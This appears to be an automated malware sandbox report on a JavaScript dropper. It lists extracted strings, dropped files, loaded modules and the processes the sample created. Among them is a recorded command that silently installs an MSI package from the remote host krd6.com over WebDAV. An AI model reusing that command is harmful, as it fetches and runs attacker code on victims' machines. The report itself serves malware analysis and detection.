Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0O
Source: wscript.exe, 00000000.00000002.2181258370.00000277F44D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F44CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F455D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087652535.00000277F6501000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2181258370.00000277F455D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: wscript.exe, 00000000.00000003.2099810104.00000277F4540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr45
Source: wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: wscript.exe, 00000000.00000002.2181258370.00000277F44D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F44CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr4(
Source: wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: wscript.exe, 00000000.00000002.2181258370.00000277F44D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F44CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign
Source: wscript.exe, 00000000.00000003.2093240263.00000277F4540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/
Source: wscript.exe, 00000000.00000003.2093240263.00000277F4540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/6
Source: wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099810104.00000277F4540000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099810104.00000277F450D000.00000004.00000020.00020000.00000000.sdmp, C5C8CC0A7FE31816B4641D04654025600.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt
Source: wscript.exe, 00000000.00000003.2093161358.00000277F4563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0
Source: wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: wscript.exe, 00000000.00000003.2093240263.00000277F4540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com:80/cacert/codesigningrootr45.crt
Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: http://t2.symcb.com0
Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: http://tl.symcb.com/tl.crl0
Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: http://tl.symcb.com/tl.crt0
Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: http://tl.symcd.com0&
Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: http://www.digicert.com/CPS0
Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: https://www.advancedinstaller.com
Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: https://www.digicert.com/CPS0
Source: wscript.exe, 00000000.00000002.2181258370.00000277F44D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F44CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repo
Source: wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: https://www.thawte.com/cps0/
Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: https://www.thawte.com/repository0W
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C5C8CC0A7FE31816B4641D0465402560Jump to dropped file

System Summary

barindex
PE file has a writeable .text section
Source: forcedelctl.dll.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\62df95.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE1A8.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE3CC.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE3ED.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE40D.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{52EF198D-0C6C-406A-803F-F86D93DD7930}Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA76.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIE1A8.tmpJump to behavior
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\sharepoint\forcedelctl.dll 3BCA1DCAEF4430272B9029C9A4BC8BE0D45ECFF66E8DE8679ED30D8AFAB00F6F
Source: Joe Sandbox ViewDropped File: C:\Windows\Installer\MSIE1A8.tmp 426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
Source: Joe Sandbox ViewDropped File: C:\Windows\Installer\MSIE3CC.tmp 426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
Source: Doc_m42_81h118103-88o62135w8623-1999q9.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal84.spyw.evad.winJS@5/18@2/3
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C5C8CC0A7FE31816B4641D0465402560Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\yfdfromkrrgw
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF3720980220C5D330.TMPJump to behavior
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_m42_81h118103-88o62135w8623-1999q9.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\msiexec.exe msiexec.exe /i \\krd6.com@80\share\avp.msi /qn
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 52F9060B0A3925FB79F0CEC8B387C410
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 52F9060B0A3925FB79F0CEC8B387C410Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: drprov.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntlanman.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: davclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: davhlpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: drprov.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntlanman.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: davclnt.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: davhlpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.dr
Source: forcedelctl.dll.8.drStatic PE information: real checksum: 0x8629a should be: 0xf0c20

Persistence and Installation Behavior

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE1A8.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE3CC.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE40D.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\sharepoint\forcedelctl.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE3ED.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE1A8.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE3CC.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE40D.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE3ED.tmpJump to dropped file
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE1A8.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE3CC.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE40D.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\sharepoint\forcedelctl.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE3ED.tmpJump to dropped file
Source: C:\Windows\System32\wscript.exe TID: 3040Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4924Thread sleep time: -180000s >= -30000sJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: \Device\Mup\krd6.com@80\share\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: wscript.exe, 00000000.00000002.2181258370.00000277F450D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F450D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099810104.00000277F450D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
